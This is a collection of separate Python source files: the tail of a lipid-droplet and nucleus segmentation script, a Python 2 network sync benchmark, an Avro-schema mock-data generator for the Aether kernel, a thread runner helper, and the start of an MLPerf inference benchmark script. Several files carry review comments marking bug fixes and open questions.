    TOtsu[TOtsu < ret] = 0
    TOtsu[TOtsu != 0] = 1
    # Confident pixels (both enhancements agreed) plus recovered uncertain ones.
    finalMask = sumMask.copy()
    finalMask[finalMask < 2] = 0
    finalMask[finalMask != 0] = 1
    finalMask = finalMask + TOtsu
    return finalMask
## Function to detect nuclei in Hoescht channel ##
def detectNucs(imgToProces, typicDiam):
    """Detect nuclei in the Hoechst channel.

    :param imgToProces: raw nuclei image (2-D intensity array)
    :param typicDiam: average nucleus diameter in pixels (resolution dependent)
    :return: binary (0/1) mask of the cleaned nuclei
    """
    halfDiam = round(typicDiam / 2)
    # Top-hat at three scales around the typical diameter to tolerate size variation.
    imgProc = TopHatBasic(imgToProces, typicDiam - halfDiam) + TopHatBasic(imgToProces, typicDiam) + TopHatBasic(imgToProces, typicDiam + halfDiam)
    imgProcNorm = norm255(imgProc)
    imgProcNorm = np.uint8(imgProcNorm)
    imgProcNorm[imgProcNorm > 0] = 1
    # BUG FIX: np.int alias was removed in NumPy 1.24 -> use builtin int.
    imgProcOpen = ndimage.binary_opening(imgProcNorm, structure=np.ones((4, 4))).astype(int)
    return imgProcOpen
## Function of normalization [0;255] ##
def norm255(ImgIn):
    """Linearly rescale an image to the range [0, 255] as floats.

    A constant image (max == min) is returned as all zeros instead of
    dividing by zero, which previously produced NaN/inf values.
    """
    ImgIn = ImgIn.astype(float)
    span = ImgIn.max() - ImgIn.min()
    if span == 0:
        # No contrast to stretch.
        return np.zeros_like(ImgIn)
    imgOut = ((ImgIn - ImgIn.min()) / span) * 255
    return imgOut
## Modified New White Top Hat ##
def TopHatBasic(f, diamVal):
    """Modified new white top hat: enhance dim bright spots and reduce local
    background.

    :param f: image to process
    :param diamVal: typical feature diameter used to size the filters
    :return: processed image (f minus its estimated local background)
    """
    size = int(diamVal)
    margin = int(round(size / 7))
    # Solid square structuring element.
    solid = np.ones((size, size))
    # Hollow ring footprint: ones on the border, zeros in the middle.
    ring = np.ones((size, size))
    ring[margin:size - margin, margin:size - margin] = 0
    # White top-hat variant: dilate with the ring, erode with the full square.
    dilated = ndimage.grey_dilation(f, footprint=ring)
    eroded = ndimage.grey_erosion(dilated, footprint=solid)
    background = np.minimum(eroded, f)
    return f - background
## Enhanced contrast curvature ##
## Enhanced edges and gap between LD
## Input: forimg : Image to process
## sigma: Sigma for the gaussian kernel
## Output: Processed image
def enhanceContrast(orimg, sigma):
    """Edge/curvature enhancement: smaller Hessian eigenvalue of the
    Gaussian-smoothed image, rescaled to uint8 [0, 255]."""
    Img = np.copy(orimg)
    gau = gauss_kern2(Img, sigma)
    # Smooth by multiplication in the frequency domain (circular convolution).
    Imgfft = np.fft.rfft2(Img)
    gfft = np.fft.rfft2(gau)
    fftimage = np.multiply(Imgfft, gfft)
    Img_smooth = np.real(np.fft.ifftshift(np.fft.irfft2(fftimage)))
    # Hessian components via repeated gradients.
    Iy, Ix = np.gradient(Img_smooth)
    Ixy, Ixx = np.gradient(Ix)
    Iyy, Iyx = np.gradient(Iy)
    eigvallam = np.zeros((2, Ixx.shape[0], Ixx.shape[1]))
    trhessian = Ixx + Iyy
    dethessian = Ixx * Iyy - Ixy * Ixy
    # Closed-form eigenvalues of the per-pixel 2x2 Hessian.
    eigvallam[0, :, :] = 0.5 * (trhessian + np.sqrt(trhessian * trhessian - (4 * dethessian)))
    eigvallam[1, :, :] = 0.5 * (trhessian - np.sqrt(trhessian * trhessian - (4 * dethessian)))
    eigh1 = eigvallam.min(0)
    eigh2 = eigvallam.max(0)  # NOTE(review): unused -- presumably kept for debugging
    etemp = np.copy(eigh1)
    # Rescale the minimum eigenvalue to [0, 255].
    # NOTE(review): divides by etemp.max(); a constant eigenvalue field would
    # divide by zero -- confirm inputs always have contrast.
    etemp = etemp - etemp.min()
    etemp = etemp / etemp.max()
    etemp = np.uint8(etemp * 255)
    return(etemp)
def gauss_kern2(Img, sigma):
    """Return a normalized, centered 2D Gaussian kernel matching Img's shape."""
    rows, cols = Img.shape
    row_idx, col_idx = np.mgrid[0:rows, 0:cols]
    # Center the grid on the middle of the image.
    row_idx = row_idx - rows / 2
    col_idx = col_idx - cols / 2
    kernel = np.exp(-(row_idx ** 2 + col_idx ** 2) / (2 * sigma ** 2))
    # Normalize so the kernel sums to 1.
    return kernel / kernel.sum()
#################### Main ####################
def segmentFatDroplet(listPlates):
    """Segment LDs and nuclei for every well under the given plate folders,
    then write a CSV listing the cleaned images for CellProfiler.

    State is shared with the workerSeg threads via module-level globals.
    """
    ## Detection !
    ## Initialise variables
    global q
    global inputCellProfilerPath
    global outputDetPath
    global list4CP
    ## Initialise paths
    inputDataPath = settings.pathList[1]
    outputDetPath = settings.pathList[3]
    inputCellProfilerPath = settings.pathList[4]
    ## Initialise threads
    # One worker thread per CPU core.
    nProc = multiprocessing.cpu_count()
    threadsList = [threading.Thread(target=workerSeg) for i in range(0, nProc)]
    q = Queue.Queue()
    ## Fill up the queue for threading
    # The queue is fully populated before any worker starts, so the workers'
    # q.empty() check is a safe termination condition.
    for currFolder in listPlates:
        currPath = inputDataPath + str(currFolder) + "/"
        idxSpace = currFolder.rsplit('plate')
        currFolder = idxSpace[1]
        listSubFolder = [x for x in os.listdir(currPath) if os.path.isdir(currPath + x)]
        for currSubFolder in listSubFolder:
            currSubPath = currPath + str(currSubFolder) + "/"
            q.put(currSubPath)
    # start all threads
    for thread in threadsList:
        thread.start()
    # join all threads
    for thread in threadsList:
        thread.join()
    ## Get the paths of the processed images
    list4CP = []
    listImages = [x for x in os.listdir(inputCellProfilerPath) if x.endswith('_GFP.tif')]
    # Pair each plate/well GFP image with its NUC counterpart.
    listSubImages = [[x.rsplit('_')[0] + '_' + x.rsplit('_')[1] + '_GFP.tif'] + [x.rsplit('_')[0] + '_' + x.rsplit('_')[1] + '_NUC.tif'] for x in listImages]
    listSubImages = [item for sublist in listSubImages for item in sublist]
    ## Export paths for input in CellProfiler
    list4CP = [[os.path.abspath(inputCellProfilerPath + x)] for x in listSubImages]
    list4CP = sorted(list4CP, key=lambda x: x[0])
    # NOTE(review): binary mode 'wb' for csv and the 'unixpwd' dialect suggest
    # Python 2 and a dialect registered elsewhere -- confirm before porting.
    with open(inputCellProfilerPath + "CellProfilerInput.csv", 'wb') as csvfile:
        writer = csv.writer(csvfile, dialect='unixpwd')
        for i in range(0, len(list4CP)):
            content = list4CP[i]
            writer.writerow(content)
network_benchmark_rate_basic.py | import requests
import time
import json
import pdb
import random
import optparse
import threading
import sys
import os
def jsonPrint(r):
    """Pretty-print a response's JSON body, keys sorted, with a trailing newline."""
    pretty = json.dumps(r.json(), indent=4, sort_keys=True)
    return pretty + "\n"
def ordered(obj):
    """Recursively sort dicts and lists so JSON-like objects compare deterministically.

    https://stackoverflow.com/questions/25851183/
    """
    if isinstance(obj, dict):
        return sorted((key, ordered(value)) for key, value in obj.items())
    if isinstance(obj, list):
        return sorted(ordered(item) for item in obj)
    # Scalars pass through unchanged.
    return obj
def HTTPpost(endpoint, page, jsonArg="{}"):
    """Send an HTTP POST with a JSON body to http://<IP>:<HTTPPort>/<page>."""
    url = 'http://{ip}:{port}/{page}'.format(
        ip=endpoint["IP"], port=endpoint["HTTPPort"], page=page)
    return requests.post(url, json=jsonArg)
# Module-level registry of worker threads spawned by HTTPpostAsync so the
# script can join() them all before proceeding.
threads = []


def HTTPpostAsync(endpoint, page, jsonArg="{}"):
    """Fire an HTTP post on a background thread; thread is recorded in `threads`."""
    thread = threading.Thread(target=HTTPpost, args=(endpoint, page, jsonArg))
    thread.start()
    threads.append(thread)
# Will act as controlling node if used
masterEndpoint = {"HTTPPort": 8080, "TCPPort": 9080, "IP": "localhost"}
usingMasterNode = False

# localhost test
#endpoint1 = {"HTTPPort": 8083, "TCPPort": 9083, "IP": "localhost"}
#endpoint2 = {"HTTPPort": 8081, "TCPPort": 9081, "IP": "localhost"}
#endpoint3 = {"HTTPPort": 8082, "TCPPort": 9082, "IP": "localhost"}
#allEndpoints = [ endpoint1, endpoint2, endpoint3]
#activeEndpoints = [ endpoint1, endpoint2, endpoint3]

# cloud test basic
#endpoint1 = {"HTTPPort": 8080, "TCPPort": 9080, "IP": "35.204.38.91"}
#endpoint2 = {"HTTPPort": 8080, "TCPPort": 9080, "IP": "35.204.60.187"}
#allEndpoints = [ endpoint1, endpoint2]

# google cloud test
endpoint1 = {"HTTPPort": 8080, "TCPPort": 9080, "IP": "35.204.38.91"}
endpoint2 = {"HTTPPort": 8080, "TCPPort": 9080, "IP": "35.204.60.187"}
endpoint3 = {"HTTPPort": 8080, "TCPPort": 9080, "IP": "35.234.64.165"}
endpoint4 = {"HTTPPort": 8080, "TCPPort": 9080, "IP": "35.234.132.50"}
# endpoint5 = {"HTTPPort": 8080, "TCPPort": 9080, "IP": "35.227.63.152"} # America
allEndpoints = [endpoint1, endpoint2, endpoint3, endpoint4]

# Endpoints that are transmitting
activeEndpoints = [
    endpoint1,
    endpoint2,
    endpoint3,
    endpoint4
]

# Global config
numberOfNodes = len(allEndpoints)
txSize = 2000  # bytes
txPerCall = 10000
txToSync = txPerCall * 15
totalSize = txToSync * numberOfNodes * txSize

print "Total size on each node after sync: ", totalSize / 1000000, " MB"

# Request bodies for the per-node configuration calls below.
transactionSize = {"transactionSize": txSize}
transactionsPerCall = {"transactions": txPerCall}
transactionsToSync = {"transactionsToSync": txToSync}
# Each node stops after receiving this many sync batches in total.
stopCondition = {
    "stopCondition": int(
        txToSync /
        txPerCall) *
    len(activeEndpoints)}

# Reset every node to a clean state before configuring.
for endpoint in allEndpoints:
    HTTPpost(endpoint, 'reset')

# Set up connections to each other (circular topology)
# for i in range(len(allEndpoints)):
#    if (i == len(allEndpoints)-1):
#        HTTPpost(allEndpoints[i], 'add-endpoint', allEndpoints[0])
#    else:
#        HTTPpost(allEndpoints[i], 'add-endpoint', allEndpoints[i+1])

# Fully connected topology
for endpoint in allEndpoints:
    for otherEndpoint in allEndpoints:
        if(endpoint != otherEndpoint):
            HTTPpost(endpoint, 'add-endpoint', otherEndpoint)

# Other setup parameters
for endpoint in allEndpoints:
    HTTPpost(endpoint, 'transaction-size', transactionSize)
    HTTPpost(endpoint, 'transactions-per-call', transactionsPerCall)
    HTTPpost(endpoint, 'stop-condition', stopCondition)

# Only the transmitting endpoints generate transactions.
for endpoint in activeEndpoints:
    HTTPpostAsync(endpoint, 'transactions-to-sync', transactionsToSync)

# Need to make sure everyone is ready before starting
for t in threads:
    t.join()

# master has all endpoints, set it up
if (usingMasterNode):
    for endpoint in allEndpoints:
        HTTPpost(endpoint, 'is-slave', "{}")
        HTTPpost(masterEndpoint, 'add-endpoint', endpoint)

# Schedule a synchronised start a few seconds in the future.
epoch_time = int(time.time())
timeWait = 3
threeSecondsTime = {"startTime": epoch_time + timeWait}

# Set up the start time
for endpoint in allEndpoints:
    HTTPpostAsync(endpoint, 'start-time', threeSecondsTime)
if (usingMasterNode):
    HTTPpostAsync(masterEndpoint, 'start-test-as-master', threeSecondsTime)

time.sleep(3)

# wait until they're probably done
while(True):
    time.sleep(7)
    hashPages = [HTTPpost(i, 'finished').json()["finished"] == True
                 for i in allEndpoints]
    print "Finished : ", hashPages
    if(sum(hashPages) == len(hashPages)):
        break

# Get the time each node took to synchronise
pages = []
maxTime = 0
for endpoint in allEndpoints:
    pageTemp = HTTPpost(endpoint, 'time-to-complete')
    print jsonPrint(pageTemp)
    if(pageTemp.json()["timeToComplete"] > maxTime):
        maxTime = pageTemp.json()["timeToComplete"]
    pages += pageTemp

if (usingMasterNode):
    pageTemp = HTTPpost(masterEndpoint, 'time-to-complete')
    print jsonPrint(pageTemp)
    if(pageTemp.json()["timeToComplete"] > maxTime):
        maxTime = pageTemp.json()["timeToComplete"]
    pages += pageTemp

# Throughput summary derived from the slowest node.
print "Max time: ", maxTime
TPS = (txToSync * numberOfNodes) / maxTime
print "Transactions per second: ", TPS
print "Transactions per second per node: ", TPS / numberOfNodes
print "Mbits/s", (TPS * txSize * 8) / 1000000
print "Mbits/s per node", (TPS * txSize * 8) / 1000000 / numberOfNodes

# NOTE(review): exit(1) makes the hash verification below unreachable dead
# code -- confirm whether it was disabled deliberately.
exit(1)

# Check that they have synchronised correctly
print "inspecting the hashes (may take a long time)"
hashPages = []
hashes = [ordered(HTTPpost(i, 'transactions-hash').json())
          for i in allEndpoints]
#hashes = [1, 1]
comparison = [x == hashes[0] for x in hashes]
if(all(comparison) == False):
    print "FAILED TO MATCH: "
    print hashes
    res = [HTTPpost(i, 'transactions').json() for i in allEndpoints]
    for r in res:
        for i in r:
            print i
        print ""
else:
    print "Hashes matched!"
    print hashes[0]
|
mocker.py | # Copyright (C) 2018 by eHealth Africa : http://www.eHealthAfrica.org
#
# See the NOTICE file distributed with this work for additional information
# regarding copyright ownership.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import collections
from collections import namedtuple
import json
import logging
from queue import Queue, Empty
import os
from random import randint, uniform, choice, sample
import signal
import string
from threading import Thread
from time import sleep
from uuid import uuid4
log = logging.getLogger(__name__)
log.setLevel(logging.DEBUG)
from aether.client import KernelClient
class Generic(object):
    '''
    Default mocking functions for each primitive type, kept here as generic.
    '''

    @staticmethod
    def boolean():
        # Fair coin flip.
        return choice([True, False])

    @staticmethod
    def float():
        return uniform(.01, 1000.00)

    @staticmethod
    def int():
        return randint(1, 99999)

    @staticmethod
    def null():
        return None

    @staticmethod
    def string():
        # 3-11 distinct lowercase letters.
        letters = sample(string.ascii_lowercase, choice(range(3, 12)))
        return "".join(letters)

    @staticmethod
    def uuid():
        return str(uuid4())

    @staticmethod
    def geo_lat():
        return uniform(0.00000000000, 60.00000000000)

    @staticmethod
    def geo_lng():
        return uniform(0.00000000000, 180.00000000000)
class DataMocker(object):
    '''
    An extensible tool that consumes an Avro Schema and creates junk data that matches it.
    Data generation methods can be overridden on a per type [text, int, etc] basis via:
    override_type(type_name, fn)
    Override methods can also be passed on a property name basis [lat, lon, name] via:
    override_property(property_name, fn)
    '''

    def __init__(self, name, schema, parent):
        # Tuning knobs for mock generation.
        self.MAX_ARRAY_SIZE = 4
        self.QUEUE_WORKERS = 10
        self.REUSE_COEFFICIENT = 0.85
        self.name = name
        self.raw_schema = schema
        self.parent = parent  # MockingManager routing cross-type references
        self.subschema = {}
        self.primative_types = [
            "null",
            "boolean",
            "int",
            "long",
            "float",
            "double",
            "bytes",
            "string"
        ]
        # Default generator per primitive type.
        self.type_methods = {
            primative: MockFn(self._default(primative))
            for primative in self.primative_types
        }
        self.created = []  # ids of created entities
        self.reuse = 0  # number of recycled entity ids
        self.count = 0  # number of entity references to this type
        self.property_methods = {}
        self.required = []
        self.ignored_properties = []
        self.restricted_types = {}
        self.instructions = {}
        self.killed = False
        self._queue = Queue()
        self.__start_queue_process()
        self.override_property("id", MockFn(Generic.uuid))
        self.load()

    def _default(self, primative):
        """Map an Avro primitive type name to its default Generic mock function."""
        if primative in ["int", "long"]:
            return Generic.int
        if primative in ["float", "double"]:
            return Generic.float
        # BUG FIX: these comparisons used `is` on string literals, which is an
        # identity check that only worked through CPython string interning.
        if primative == "null":
            return Generic.null
        if primative == "string":
            return Generic.string
        if primative == "boolean":
            return Generic.boolean
        # NOTE(review): "bytes" falls through to None -- confirm bytes fields
        # are never mocked, otherwise MockFn(None)() will raise.
        return None

    def kill(self):
        """Signal the queue worker threads to exit."""
        self.killed = True

    def __start_queue_process(self):
        # Workers fulfil deferred instance creation (see quick_reference).
        for x in range(self.QUEUE_WORKERS):
            worker = Thread(target=self.__reference_runner, args=[])
            worker.daemon = False
            worker.start()

    def __reference_runner(self):
        # Drain self._queue until kill() is called.
        while True:
            if self.killed:
                break
            try:
                fn = self._queue.get(block=True, timeout=1)
                fn()
            except Empty:
                if self.killed:
                    break
                sleep(1)
            except Exception as err:
                raise err

    def get_reference(self, exclude=None):
        # called from other types to generate this one (lazily)
        # returns an ID, either by registering a new instance
        # or by returning a value from created
        self.count += 1
        # After 100 references, recycle existing ids with probability REUSE_COEFFICIENT.
        thresh = 0 if self.count <= 100 else (100 * self.REUSE_COEFFICIENT)
        new = (randint(0, 100) >= thresh)
        if new:
            _id = self.quick_reference()
        else:
            # Skip the newest ids; their instances may not be fulfilled yet.
            items = self.created[:-4]
            if items:
                self.reuse += 1
                _id = choice(items)
            else:
                _id = self.quick_reference()
        return _id

    def quick_reference(self):
        # generates an id for this type
        # queues a job to actually make the instance
        _id = None
        if self.property_methods.get('id'):
            fn = self.property_methods.get('id')
            _id = fn()
        else:
            # BUG FIX: was `self.instuctions` (typo), raising AttributeError
            # whenever no 'id' property override existed.
            fn = [fn for name, fn in self.instructions.get(
                self.name) if name == 'id']
            if not fn:
                raise ValueError("Couldn't find id function")
            _id = fn[0]()
        deffered_generation = MockFn(self.fullfill_reference, [_id])
        self._queue.put(deffered_generation)
        return _id

    def fullfill_reference(self, _id):
        # the method called from the queue to create an instance
        new_record = self.get(set_id=_id)
        self.parent.register(self.name, new_record)
        return _id

    def get(self, record_type="default", set_id=None):
        """Create one mock instance of this type (wraps _get)."""
        # BUG FIX: `record_type is "default"` -> `==` (identity vs equality).
        if record_type == "default":
            body = self._get(self.name)
            if set_id:
                body['id'] = set_id
            self.created.append(body.get('id'))
            return body
        else:
            return self._get(record_type)

    def _get(self, name):
        # actually compiles the instruction set for this type and returns the body
        instructions = self.instructions.get(name)
        if not instructions:
            # Fall back through the manager's short-name/full-name aliases.
            alt = self.parent.names.get(name)
            instructions = self.instructions.get(alt)
        if not instructions:
            raise ValueError("No instructions for type %s" % name)
        body = {}
        for name, fn in instructions:
            body[name] = fn()
        return body

    def gen(self, _type):
        # generation of avro primitive types
        return self.type_methods.get(_type)

    def gen_array(self, _type):
        # generation of an array of any type
        fn = self.gen(_type)
        return MockFn(self._gen_array, [fn])

    def _gen_array(self, fn):
        size = choice(range(2, self.MAX_ARRAY_SIZE))
        return [fn() for i in range(size)]

    def gen_random_type(self, name=None, _types=None):
        if _types is None:
            _types = []
        return MockFn(self._gen_random_type, [name, _types])

    def _gen_random_type(self, name, types):
        # picks one of the valid types available for the field and completes it
        if name in self.required:
            types = [i for i in types if i != "null"]
        _type = choice(types)
        fn = None
        if isinstance(_type, dict):
            if _type.get("type", None) != "array":
                raise ValueError("unexpected type, %s" % _type.get('type'))
            items = _type.get("items")
            fn = self.gen_array(items)
            return fn()
        elif isinstance(_type, list):
            if name in self.required:
                # BUG FIX: referenced the undefined name `_types` (NameError);
                # the nested list `_type` is what needs filtering.
                _type = [i for i in _type if i != "null"]
            _type = choice(_type)
        if _type not in self.primative_types:
            fn = self.gen_complex(_type)
        else:
            fn = self.gen(_type)
        return fn()

    def gen_complex(self, _type):
        return MockFn(self._gen_complex, _type)

    def _gen_complex(self, name):
        # handles generation of associated (record) types; unknown names mock to null
        try:
            return self._get(name)
        except ValueError:
            fn = self.gen("null")
            return fn()

    def gen_reference(self, name, _type, types):
        # gets a reference to a foreign type
        # usually triggers creation via the other type's get_reference()
        return MockFn(self._gen_reference, [name, _type, types])

    def _gen_reference(self, name, _type, types):
        if name in self.required:
            types = [i for i in types if i != "null"]
        chosen = choice(types)
        if isinstance(chosen, str):
            return self.parent.get_reference(_type)
        else:
            # Array of references.
            # BUG FIX: was self.get_reference(_type), which generated ids of
            # THIS type (and silently passed _type as `exclude`) rather than
            # routing to the referenced type's mocker.
            size = choice(range(2, self.MAX_ARRAY_SIZE))
            return [self.parent.get_reference(_type) for i in range(size)]

    def ignore(self, property_name):
        # turn off mocking for this property
        self.ignored_properties.append(property_name)

    def override_type(self, type_name, fn):
        # provide an override method for an avro type
        # fn is a MockFn object
        self.type_methods[type_name] = fn
        self.load()

    def override_property(self, property_name, fn):
        # overrides a property in this type by name with a new function
        # for example instead of returning a random string for the name field, pick from a list
        # fn is a MockFn object
        self.property_methods[property_name] = fn
        self.load()

    def load(self):
        # loads schema definition for this type
        self.schema = json.loads(self.raw_schema)
        if isinstance(self.schema, list):
            for obj in self.schema:
                self.parse(obj)
        else:
            self.parse(self.schema)

    def parse(self, schema):
        # looks at all the types called for
        # matches simple types to type_methods
        # stubs external calls to parent for linked types
        name = schema.get("name")
        instructions = []
        fields = schema.get("fields", [])
        for field in fields:
            instructions.append(self._comprehend_field(field))
        self.instructions[name] = instructions
        for i in self.instructions[name]:
            log.debug("Add instruction to %s : %s" % (name, i))

    def _comprehend_field(self, field):
        # picks apart an avro definition of a field and builds mocking functions
        name = field.get("name")
        if name in self.ignored_properties:
            return (name, self.gen("null"))  # Return null function and get out
        try:
            ref_type = field.get("jsonldPredicate").get("_id")
            types = field.get('type')
            # This is a reference property  # TODO THIS MIGHT WANT TO BE sub_type
            return (name, self.gen_reference(name, ref_type, types))
        except Exception:
            pass  # Not a reference field (no jsonldPredicate); fall through.
        if name in self.property_methods.keys():
            # We have an explicit method for this
            return (name, self.property_methods.get(name))
        types = field.get("type")
        if isinstance(types, str):
            return (name, self.gen(types))  # Single type for this field
        if name in self.restricted_types.keys():  # we've limited the types we want to mock
            # BUG FIX: a restriction must narrow the candidate set; the old
            # union() silently widened it instead.
            types = list(set(types) & set(self.restricted_types.get(name)))
        return tuple([name, self.gen_random_type(name, types)])

    def require(self, *property):
        # Make a field never resolve to null (if null is an option).
        # BUG FIX: *property always binds a tuple, so the old isinstance(list)
        # branch never ran and the whole tuple was appended as one element,
        # defeating later `name in self.required` membership checks.
        self.required.extend(property)

    def restrict_type(self, property_name, allowable_types=None):
        # some properties can be completed by multiple types of properties
        # for example [null, int, string[]?].
        # restrict_type allows you to chose a subset of the permitted types for mocking
        if allowable_types is None:
            allowable_types = []
        self.restricted_types[property_name] = allowable_types
class MockFn(namedtuple("MockFn", ("fn", "args"))):
    """Callable wrapper pairing a function with the arguments it is invoked with."""

    def __new__(cls, fn, args=None):
        return super(MockFn, cls).__new__(cls, fn, args)

    def __call__(self):
        # Single non-list argument: pass it through as-is.
        if self.args and not isinstance(self.args, list):
            return self.fn(self.args)
        try:
            # Duck-type-y: unpack a list of args, or call with none at all.
            return self.fn(*self.args) if self.args else self.fn()
        except TypeError:
            # The callable wanted the list itself, not unpacked elements.
            return self.fn(self.args)
class MockingManager(object):
    """Connects to an Aether kernel, loads all schemas, and owns one DataMocker per type."""

    def __init__(self, kernel_url=None, kernel_credentials=None):
        # connects to Aether and gets available schemas.
        # constructs a DataMocker for each type
        if not kernel_url:
            kernel_url = "http://kernel.aether.local:8000/v1"
        if not kernel_credentials:
            # NOTE(review): raises KeyError if the env vars are unset -- confirm intended.
            kernel_credentials = {
                "username": os.environ['KERNEL_ADMIN_USERNAME'],
                "password": os.environ['KERNEL_ADMIN_PASSWORD']
            }
        self.client = KernelClient(kernel_url, **kernel_credentials)
        self.types = {}  # short and full type name -> DataMocker
        self.alias = {}  # short name <-> full name
        self.names = {}  # short name <-> full name (same pairs as alias)
        self.project_schema = {}  # schema id <-> project-schema id
        self.schema_id = {}  # type name <-> schema id
        self.type_client = {}  # short name -> kernel entity client
        self.type_count = {}  # short name -> number of registered instances
        # Stop the mockers' worker threads cleanly on Ctrl-C / SIGTERM.
        signal.signal(signal.SIGTERM, self.kill)
        signal.signal(signal.SIGINT, self.kill)
        self.load()

    def get(self, _type):
        """Create a mock instance of _type; raises KeyError for unknown types."""
        if not _type in self.types.keys():
            msg = "No schema for type %s" % (_type)
            log.error(msg)
            raise KeyError(msg)
        return self.types.get(_type).get()

    def get_reference(self, _type):
        """Return an id referencing an instance of _type (instance created lazily)."""
        if not _type in self.types.keys():
            msg = "No schema for type %s" % (_type)
            log.error(msg)
            raise KeyError(msg)
        return self.types.get(_type).get_reference()

    def kill(self, *args, **kwargs):
        # Signal-handler compatible signature; stops every mocker's workers.
        for name, mocker in self.types.items():
            log.info("Stopping thread for %s" % name)
            mocker.kill()

    def register(self, name, payload=None):
        # register an entity of type 'name'
        # if no payload is passed, an appropriate one will be created
        count = self.type_count.get(name, 0)
        count += 1
        self.type_count[name] = count
        if not payload:
            payload = self.types[name].get()
        type_name = self.alias.get(name)
        type_id = self.schema_id.get(name)
        ps_id = self.project_schema.get(type_id)
        data = self.payload_to_data(ps_id, payload)
        # NOTE(review): submission result `res` is unused -- confirm errors surface elsewhere.
        res = self.type_client[type_name].submit(data)
        log.debug("Created instance # %s of type %s" % (self.type_count[name], name))
        return data

    def payload_to_data(self, ps_id, payload):
        # wraps data in expected aether jargon for submission
        data = {
            "id": payload['id'],
            "payload": payload,
            "projectschema": ps_id,
            "revision": 1,
            "status": "Publishable"
        }
        return data

    def load(self):
        # loads schemas and project schemas from aether client
        log.debug("Loading schemas from Aether Kernel")
        for schema in self.client.Resource.Schema:
            name = schema.get("name")
            log.debug("Loading schema for type %s \n%s" % (name, schema))
            _id = schema.get('id')
            definition = schema.get('definition')
            if isinstance(definition, str):
                definition = json.loads(definition)
            if isinstance(definition, list):
                # Multi-record schema: pick the record whose name matches.
                full_name = [obj.get("name") for obj in definition if obj.get(
                    'name').endswith(name)][0]
            else:
                full_name = definition.get('name')
                namespace = definition.get('namespace')
                if namespace:
                    if not name in namespace:
                        full_name = namespace+"."+name
            self.types[full_name] = DataMocker(
                full_name, json.dumps(definition), self)
            # Register both directions so lookups work with either name form.
            self.names[name] = full_name
            self.names[full_name] = name
            self.types[name] = self.types[full_name]
            self.alias[full_name] = name
            self.alias[name] = full_name
            self.schema_id[name] = _id
            self.schema_id[full_name] = _id
            self.schema_id[_id] = name
            self.type_client[name] = self.client.Entity.get(name, strict=False)
        for ps in self.client.Resource.ProjectSchema:
            schema_id = ps.get('schema')
            _id = ps.get('id')
            # Bidirectional schema-id <-> project-schema-id mapping.
            self.project_schema[schema_id] = _id
            self.project_schema[_id] = schema_id
|
Runner.py | import threading
class Runner:
    """Helper that launches a `launcher` object's run() method on a daemon thread."""

    @staticmethod
    def run(launcher, *args):
        """Start launcher.run(*args) on a daemon thread and return the Thread.

        :param launcher: any object exposing a run(*args) method
        :param args: positional arguments forwarded to launcher.run
        :return: the started threading.Thread
        """
        thread = threading.Thread(
            target=launcher.run,
            args=args,
            # Use the class *name*; passing the class object relied on Thread's
            # implicit str() conversion.
            name=type(launcher).__name__,
        )
        # The daemon property replaces setDaemon(), deprecated since Python 3.10.
        thread.daemon = True
        thread.start()
        return thread
|
main.py | """
mlperf inference benchmarking tool
"""
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import argparse
import json
import logging
import os
import threading
import time
from queue import Queue
import mlperf_loadgen as lg
import numpy as np
import dataset
import imagenet
import coco
logging.basicConfig(level=logging.INFO)
log = logging.getLogger("main")
# unit conversion factors (seconds -> ns / ms)
NANO_SEC = 1000000000
MILLI_SEC = 1000
# pylint: disable=missing-docstring
# the datasets we support:
# name -> (dataset class, pre-processor, post-processor, extra ctor kwargs)
SUPPORTED_DATASETS = {
    "imagenet":
        (imagenet.Imagenet, dataset.pre_process_vgg, dataset.PostProcessCommon(offset=-1),
         {"image_size": [224, 224, 3]}),
    "imagenet_mobilenet":
        (imagenet.Imagenet, dataset.pre_process_mobilenet, dataset.PostProcessArgMax(offset=-1),
         {"image_size": [224, 224, 3]}),
    "coco":
        (coco.Coco, dataset.pre_process_coco_mobilenet, coco.PostProcessCoco(),
         {"image_size": [-1, -1, 3]}),
}
# pre-defined command line options so simplify things. They are used as defaults and can be
# overwritten from command line
DEFAULT_LATENCY_BUCKETS = "0.010,0.050,0.100,0.200,0.400"
# profile name -> option overrides layered on top of "defaults" by get_args()
SUPPORTED_PROFILES = {
    "defaults": {
        "dataset": "imagenet",
        "backend": "tensorflow",
        "cache": 0,
        "time": 128,
        "max-latency": DEFAULT_LATENCY_BUCKETS,
    },
    # resnet
    "resnet50-tf": {
        "inputs": "input_tensor:0",
        "outputs": "ArgMax:0",
        "dataset": "imagenet",
        "backend": "tensorflow",
    },
    "resnet50-onnxruntime": {
        "dataset": "imagenet",
        "outputs": "ArgMax:0",
        "backend": "onnxruntime",
    },
    # mobilenet
    "mobilenet-tf": {
        "inputs": "input:0",
        "outputs": "MobilenetV1/Predictions/Reshape_1:0",
        "dataset": "imagenet_mobilenet",
        "backend": "tensorflow",
    },
    "mobilenet-onnx": {
        "dataset": "imagenet_mobilenet",
        "outputs": "MobilenetV1/Predictions/Reshape_1:0",
        "backend": "onnxruntime",
    },
    # ssd-mobilenet
    "ssd-mobilenet-tf": {
        "inputs": "image_tensor:0",
        "outputs": "num_detections:0,detection_boxes:0,detection_scores:0,detection_classes:0",
        "dataset": "coco",
        "backend": "tensorflow",
    },
    "ssd-mobilenet-onnxruntime": {
        "dataset": "coco",
        "outputs": "num_detections:0,detection_boxes:0,detection_scores:0,detection_classes:0",
        "backend": "onnxruntime",
        "data-format": "NHWC",
    },
}
# per-query latencies of the most recent run; set by process_latencies() in main()
last_timeing = None
def get_args():
    """Parse commandline.

    Defaults come from SUPPORTED_PROFILES: the "defaults" profile is the
    base, the profile chosen via --profile is layered on top, and the merged
    values fill in any option not given explicitly on the command line.

    :return: argparse.Namespace with list-valued inputs/outputs/max_latency
    """
    parser = argparse.ArgumentParser()
    parser.add_argument("--dataset", choices=SUPPORTED_DATASETS.keys(), help="dataset")
    parser.add_argument("--dataset-path", required=True, help="path to the dataset")
    parser.add_argument("--dataset-list", help="path to the dataset list")
    parser.add_argument("--data-format", choices=["NCHW", "NHWC"], help="data format")
    parser.add_argument("--profile", choices=SUPPORTED_PROFILES.keys(), help="standard profiles")
